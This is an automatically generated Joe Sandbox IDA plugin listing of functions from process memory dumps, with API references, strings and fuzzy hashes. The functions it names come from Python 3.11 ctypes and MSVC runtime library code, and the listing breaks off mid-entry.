Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: cf0ce418dbf8095189d4875bbd922365259c44d693191a2e82a2bfde5589004d
Instruction ID: 0dcf7bc75829da665f587dbd17a42de5fc73123d02d03b391cbf91ab3c58fcea
Opcode Fuzzy Hash: cf0ce418dbf8095189d4875bbd922365259c44d693191a2e82a2bfde5589004d
Instruction Fuzzy Hash: 9E51D331E09BC281FA659F2CD4442B867A4AF85FE6F09A436CB8D86795DF3CE455D300

Function 00007FF8B93CF990 Relevance: 12.1, APIs: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PyMem_Free.PYTHON311 ref: 00007FF8B93CF9AE
PyMem_Free.PYTHON311 ref: 00007FF8B93CF9BB
PyMem_Free.PYTHON311 ref: 00007FF8B93CF9D0
PyMem_Malloc.PYTHON311 ref: 00007FF8B93CFAA6
PyMem_Malloc.PYTHON311 ref: 00007FF8B93CFAE5
memcpy.VCRUNTIME140 ref: 00007FF8B93CFB0C
PyMem_Malloc.PYTHON311 ref: 00007FF8B93CFB27
PyErr_NoMemory.PYTHON311 ref: 00007FF8B93CFB36

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Mem_$FreeMalloc$Err_Memorymemcpy
String ID:
API String ID: 920471837-0
Opcode ID: c91e9501240dbb047462beff57c3e24aa08f07d97696b8881faa54e688d9ffaf
Instruction ID: fe2faf10e4f9ae22baa54f69edb2ed304274a4bcfa27696e32a4226841b00b38
Opcode Fuzzy Hash: c91e9501240dbb047462beff57c3e24aa08f07d97696b8881faa54e688d9ffaf
Instruction Fuzzy Hash: 70512B26A09FC592EB598F3995503B963B0FF59B84F18A235CF5D13296DF38A0E9C300

Function 00007FF8B93C2894 Relevance: 12.1, APIs: 8, Instructions: 105COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON311 ref: 00007FF8B93C756E
PyTuple_New.PYTHON311 ref: 00007FF8B93C7585
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C759C

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$Tuple_
String ID:
API String ID: 828192933-0
Opcode ID: 5e62f5604a1117c70738b5e9d10e81d038eb8c1c9d08bc44558772b595a0c4de
Instruction ID: be2755c4e740d60f694464fd7c673bd4143209f9572075b49691a515fc6cde9e
Opcode Fuzzy Hash: 5e62f5604a1117c70738b5e9d10e81d038eb8c1c9d08bc44558772b595a0c4de
Instruction Fuzzy Hash: 76419D72909B8385EAA58F2DA81463A22B4FF8ABD4F046134DF4E02660DF3CE498C700

Function 00007FF8B93C1178 Relevance: 12.1, APIs: 8, Instructions: 95COMMON

Download Yara Rule

APIs

_PyDict_ContainsId.PYTHON311 ref: 00007FF8B93C1E1D
PyDict_Update.PYTHON311 ref: 00007FF8B93C1E5B
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C1E7E
_PyDict_GetItemIdWithError.PYTHON311 ref: 00007FF8B93C1EB7
_PyObject_SetAttrId.PYTHON311 ref: 00007FF8B93C1ECF
PyErr_Occurred.PYTHON311 ref: 00007FF8B93C1EF0
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C6FA7

Part of subcall function 00007FF8B93C22B0: _PyObject_MakeTpCall.PYTHON311 ref: 00007FF8B93C2301

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dict_$DeallocObject_$AttrCallContainsErr_ErrorItemMakeOccurredUpdateWith
String ID:
API String ID: 3953964043-0
Opcode ID: 514ed9f4908b8c8283f0e0c27daf6479cf123024387674585ac24fe74f6d228d
Instruction ID: 72c1dec51a88d4d6d6a449b5013fbbc2eeade43f249878218c66b8bff62be8b9
Opcode Fuzzy Hash: 514ed9f4908b8c8283f0e0c27daf6479cf123024387674585ac24fe74f6d228d
Instruction Fuzzy Hash: BB411B31A09FC781EA659F6DA9542BA62B4EF4DBD4F04A134DB4E467A0DF2CF4989300

Function 00007FF8B93C4D38 Relevance: 12.1, APIs: 8, Instructions: 78COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON311 ref: 00007FF8B93C4DC6

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc
String ID:
API String ID: 3617616757-0
Opcode ID: 068abb66bbfb9b3a2a685b208f6aebfac36357060354af221ed5b1c6e4112d13
Instruction ID: d1f6ea5335a7340b8ae90e9fd7537b306b7638a5f299d57c2b2c34937050192e
Opcode Fuzzy Hash: 068abb66bbfb9b3a2a685b208f6aebfac36357060354af221ed5b1c6e4112d13
Instruction Fuzzy Hash: 2831DA72D09F8681FBA56F78886C37A23B8EF5EF99F146134CB0E450968F2D95498300

Function 00007FF8B9F657C0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 131COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF8B9F65889
_local_unwind.LIBVCRUNTIME ref: 00007FF8B9F6592C

Strings

csm, xrefs: 00007FF8B9F65824
MOC, xrefs: 00007FF8B9F65802
RCC, xrefs: 00007FF8B9F6580E
csm, xrefs: 00007FF8B9F6596F

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: FileHeader_local_unwind
String ID: MOC$RCC$csm$csm
API String ID: 2627209546-1441736206
Opcode ID: 48d146a85fba6cc68383d4a357e19a92ddcb549a58e0a70336f33e234ca841ed
Instruction ID: 52989c83ee8e4e0925d9e4f3cb8aa1bbca0f7450c1f9067fc1a3d761d4495563
Opcode Fuzzy Hash: 48d146a85fba6cc68383d4a357e19a92ddcb549a58e0a70336f33e234ca841ed
Instruction Fuzzy Hash: EE518A72A0878286EB609F29D44137D26A0FF86BF6F142135EF8D66799CF3CE485C641

Function 00007FF8B9F6E520 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6E594
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6E5A3

Part of subcall function 00007FF8B9F6C78C: DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6C81D
Part of subcall function 00007FF8B9F6C78C: DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6C856
Part of subcall function 00007FF8B9F6C78C: DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6CB83

DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6E643
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6E653
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6E6FF

Strings

{for , xrefs: 00007FF8B9F6E5CC

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: Name::operator+
String ID: {for
API String ID: 2943138195-864106941
Opcode ID: 416ecf82abdc7693f83b664dab0e642ebc660969777f9551cf3e7d4c265d34da
Instruction ID: 760986aab24fc5e8c44c3b0cb005035bea354c41e426d9fc37a4db498763b490
Opcode Fuzzy Hash: 416ecf82abdc7693f83b664dab0e642ebc660969777f9551cf3e7d4c265d34da
Instruction Fuzzy Hash: 69514B72A18BC5A9FB019F28D4453E83BA1EB44799F44A031EB4C4BBA9DF7CD564C350

Function 00007FF8B93C2050 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON311 ref: 00007FF8B93C7003
PyObject_IsInstance.PYTHON311 ref: 00007FF8B93C7015
_PyObject_LookupAttrId.PYTHON311 ref: 00007FF8B93C70CE
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C70FC

Part of subcall function 00007FF8B93C3DC0: _PyObject_New.PYTHON311(?,?,?,?,00007FF8B93C46A2,?,?,?,00007FF8B93C1959), ref: 00007FF8B93C3DCB

Strings

wrong type, xrefs: 00007FF8B93C7116

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Object_$Dealloc$AttrInstanceLookup
String ID: wrong type
API String ID: 1828014136-2191655096
Opcode ID: 48019a5db2fa545bbb614ff61a29e7f0ff849fa01fd9e197cdd365b54569e53e
Instruction ID: 558359353d906a7617688bba52366b652ece2cad7f9d8fc6ea840b06187dd513
Opcode Fuzzy Hash: 48019a5db2fa545bbb614ff61a29e7f0ff849fa01fd9e197cdd365b54569e53e
Instruction Fuzzy Hash: 17512C21A0DF9681EA509F1DD99417A23B4AF8DBC0F546431DB4E477A5EF2CE448C340

Function 00007FF8B93CBE84 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON311 ref: 00007FF8B93CBF0F

Strings

wrong type, xrefs: 00007FF8B93CC02C

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc
String ID: wrong type
API String ID: 3617616757-2191655096
Opcode ID: bdb23b902ebc4893c2a5809fa917940e2479e1e06ed5718a6fa12672c04d635d
Instruction ID: c4941d6fe43666ec0a4f70c18f279de08f36b158e0435ca241bc5d73740a7461
Opcode Fuzzy Hash: bdb23b902ebc4893c2a5809fa917940e2479e1e06ed5718a6fa12672c04d635d
Instruction Fuzzy Hash: 89510921A09F9681FA649F29E56017A63B4EF8DBC0F486531DB0E477A5DF2CE889C740

Function 00007FF8B9F6DB00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8B9F6D217), ref: 00007FF8B9F6DBC4
DName::DName.LIBVCRUNTIME ref: 00007FF8B9F6DBE3

Strings

void, xrefs: 00007FF8B9F6DB46
`template-parameter, xrefs: 00007FF8B9F6DBF1

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: NameName::atol
String ID: `template-parameter$void
API String ID: 2130343216-4057429177
Opcode ID: 7b7e14213947c3780e213c190a7c5fdcdd2a49ff05635447eaaef3bd9456bf2e
Instruction ID: 845eb7b66f644c39a83d5da6aa61cc5d592a9d8282f0d4f910e44264ff8e930f
Opcode Fuzzy Hash: 7b7e14213947c3780e213c190a7c5fdcdd2a49ff05635447eaaef3bd9456bf2e
Instruction Fuzzy Hash: 18411722F08B9688FB008FA9D8512AC27B1BF487EAF545135DF0C2AB59DF7CA545C350

Function 00007FF8B9F68900 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF8B9F6874C: Replicator::operator[].LIBVCRUNTIME ref: 00007FF8B9F687CB

DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F689B2

Strings

..., xrefs: 00007FF8B9F689EF
,..., xrefs: 00007FF8B9F68980
void, xrefs: 00007FF8B9F68A24
,<ellipsis>, xrefs: 00007FF8B9F68990
<ellipsis>, xrefs: 00007FF8B9F689FF

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: Name::operator+Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 1405650943-2211150622
Opcode ID: 463b429a368d480f938697e6d099cec3f907049628b5d1349ecbd199c78a6655
Instruction ID: fbcd7348e348d1b2ffd8c65b0988c9a0ceac77def29f07ba5c4e86e01f7bb561
Opcode Fuzzy Hash: 463b429a368d480f938697e6d099cec3f907049628b5d1349ecbd199c78a6655
Instruction Fuzzy Hash: 01415BB2E08B8A99FB518F6CD8402BC3BB0BB097AAF545539CB4C16364DF7CA545C311

Function 00007FF8B9061090 Relevance: 10.6, APIs: 7, Instructions: 62COMMON

Download Yara Rule

APIs

PyModule_GetState.PYTHON311 ref: 00007FF8B90610A6
_Py_Dealloc.PYTHON311 ref: 00007FF8B906110D

Memory Dump Source

Source File: 00000007.00000002.2087887642.00007FF8B9061000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8B9060000, based on PE: true

Associated: 00000007.00000002.2087851325.00007FF8B9060000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2087957246.00007FF8B9063000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2087988693.00007FF8B9065000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2088065900.00007FF8B9066000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9060000_lib.jbxd

Similarity

API ID: DeallocModule_State
String ID:
API String ID: 1903735390-0
Opcode ID: a7a767094c4d1de27d1ae5cfedc4f2a8987a46609b88e723d83c121dba346a55
Instruction ID: fcf7d9a8dbef881a44aee20bb0b2a09dbc8c278f3def5ceacbee71e926b7b449
Opcode Fuzzy Hash: a7a767094c4d1de27d1ae5cfedc4f2a8987a46609b88e723d83c121dba346a55
Instruction Fuzzy Hash: 1D21B732D0DAC285FFA9CF79985833832A8AF55B99F148434CB0E4A184CF7DE546D340

Function 00007FF8B93CD8F8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

PyArg_UnpackTuple.PYTHON311 ref: 00007FF8B93CD92C
PyNumber_AsSsize_t.PYTHON311 ref: 00007FF8B93CD942
PyErr_Occurred.PYTHON311 ref: 00007FF8B93CD951
PyErr_Format.PYTHON311 ref: 00007FF8B93CD988

Strings

byref() argument must be a ctypes instance, not '%s', xrefs: 00007FF8B93CD96F
byref, xrefs: 00007FF8B93CD91A

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$Arg_FormatNumber_OccurredSsize_tTupleUnpack
String ID: byref$byref() argument must be a ctypes instance, not '%s'
API String ID: 169608245-1446499295
Opcode ID: 1c7a6bb527df66017d67d4d6c8e7051229e04b236d9d6aec440ba77389511a69
Instruction ID: 55f148e703249ddf87212055504aa26b11c2d2530d60a4ecc4398006fe751b29
Opcode Fuzzy Hash: 1c7a6bb527df66017d67d4d6c8e7051229e04b236d9d6aec440ba77389511a69
Instruction Fuzzy Hash: D0211726609B8682EB108F69E86427A63B4FF8CFA4F141636DB6D47394DF6DD508C350

Function 00007FF8B93CB96C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PyDict_GetItemWithError.PYTHON311(?,?,00000001,00007FF8B93C77AC), ref: 00007FF8B93CB9AD
PyErr_Occurred.PYTHON311(?,?,00000001,00007FF8B93C77AC), ref: 00007FF8B93CB9BC
PyErr_Format.PYTHON311(?,?,00000001,00007FF8B93C77AC), ref: 00007FF8B93CB9ED

Strings

required argument '%S' missing, xrefs: 00007FF8B93CB9E6
not enough arguments, xrefs: 00007FF8B93CB9F5

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$Dict_ErrorFormatItemOccurredWith
String ID: not enough arguments$required argument '%S' missing
API String ID: 62204369-3448764933
Opcode ID: 28da8afa7e9ef03481714140949b522f70dd2a78d8c2b5e7d138b51459312286
Instruction ID: b5d6e4b76bd98abb35c26b9fdd37ffbb27f5447a12fe04bd2599ac40409251aa
Opcode Fuzzy Hash: 28da8afa7e9ef03481714140949b522f70dd2a78d8c2b5e7d138b51459312286
Instruction Fuzzy Hash: C611F965A0AFC581EB658F2AE59413A6371AF49FC4F14A431DB4E47658DF2CE489C300

Function 00007FF8B93CEB34 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON311 ref: 00007FF8B93CEB75
PyUnicode_AsWideChar.PYTHON311 ref: 00007FF8B93CEB95
PyErr_Format.PYTHON311 ref: 00007FF8B93CEBBF
PyUnicode_AsWideChar.PYTHON311 ref: 00007FF8B93CEBD0

Strings

unicode string expected instead of %s instance, xrefs: 00007FF8B93CEB67
string too long (%zd, maximum length %zd), xrefs: 00007FF8B93CEBAF

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: CharErr_FormatUnicode_Wide
String ID: string too long (%zd, maximum length %zd)$unicode string expected instead of %s instance
API String ID: 2195588020-2061977717
Opcode ID: 3df54ba06c241b92dbf221aa78cdec5a2b91a3063c00f8d20a6361d5b8dc2ae5
Instruction ID: 5f28192c31cec9011bfd3c9a4d6aa03308d0508b8929c84381bde96476e39aea
Opcode Fuzzy Hash: 3df54ba06c241b92dbf221aa78cdec5a2b91a3063c00f8d20a6361d5b8dc2ae5
Instruction Fuzzy Hash: EB118221B0CFC682EA608F5AE89417967A5EF8DFD4F546231DF1E43BA4CE2CD4598700

Function 00007FF8B9F66570 Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON

Download Yara Rule

APIs

__unDName.LIBVCRUNTIME ref: 00007FF8B9F665C6
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B9F66609
strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B9F66633
InterlockedPushEntrySList.KERNEL32 ref: 00007FF8B9F66650
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B9F6665C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B9F66665

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
String ID:
API String ID: 3741236498-0
Opcode ID: de3a4ec1d6e9946eef6b348e6d8a6ead344041b39e9dfd9c2ce66c677152b10d
Instruction ID: c8719229261f612c33cb54ffd0455e1f16cffe016b9dd22f0f6017a0dc758515
Opcode Fuzzy Hash: de3a4ec1d6e9946eef6b348e6d8a6ead344041b39e9dfd9c2ce66c677152b10d
Instruction Fuzzy Hash: 8F31B222B19BD180EB118F69E8045692794FF09FE9B559635DF2D07780EE3EE446C340

Function 00007FF8B93CC050 Relevance: 9.1, APIs: 6, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B93CC174: PyUnicode_AsUTF8.PYTHON311 ref: 00007FF8B93CC1CA
Part of subcall function 00007FF8B93CC174: strchr.VCRUNTIME140 ref: 00007FF8B93CC1DA
Part of subcall function 00007FF8B93CC174: PyErr_Format.PYTHON311 ref: 00007FF8B93CC20D

Part of subcall function 00007FF8B93C22B0: _PyObject_MakeTpCall.PYTHON311 ref: 00007FF8B93C2301

Part of subcall function 00007FF8B93C3FD4: PyDict_New.PYTHON311(?,?,00000000,00007FF8B93C3F5E,?,?,00000001,00007FF8B93C6D32), ref: 00007FF8B93C3FF2

_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC0CF
PyDict_New.PYTHON311 ref: 00007FF8B93CC0D5
PyLong_FromVoidPtr.PYTHON311 ref: 00007FF8B93CC10B
PyDict_SetItem.PYTHON311 ref: 00007FF8B93CC123
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC134
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC148

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: DeallocDict_$CallErr_FormatFromItemLong_MakeObject_Unicode_Voidstrchr
String ID:
API String ID: 4054517332-0
Opcode ID: 183dbe4e66a78b5f82bf9fcbdc5b815f8fe5dd19242b5949e3bcf8ed559180f2
Instruction ID: a45da57fc1fd227ade508a5dac7f36cd3d58102d96f471293583f76ae4e5f943
Opcode Fuzzy Hash: 183dbe4e66a78b5f82bf9fcbdc5b815f8fe5dd19242b5949e3bcf8ed559180f2
Instruction Fuzzy Hash: 2C31EB31A0AF8681EE649F2AA95403A62B4EF4DFD4F4C6934DF4E46795DF2CE4558300

Function 00007FF8B93C37B0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 257COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON311 ref: 00007FF8B93C3874
PyErr_SetString.PYTHON311 ref: 00007FF8B93C86D3
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C86E2

Strings

has no _stginfo_, xrefs: 00007FF8B93C856F, 00007FF8B93C86C9

Memory Dump Source

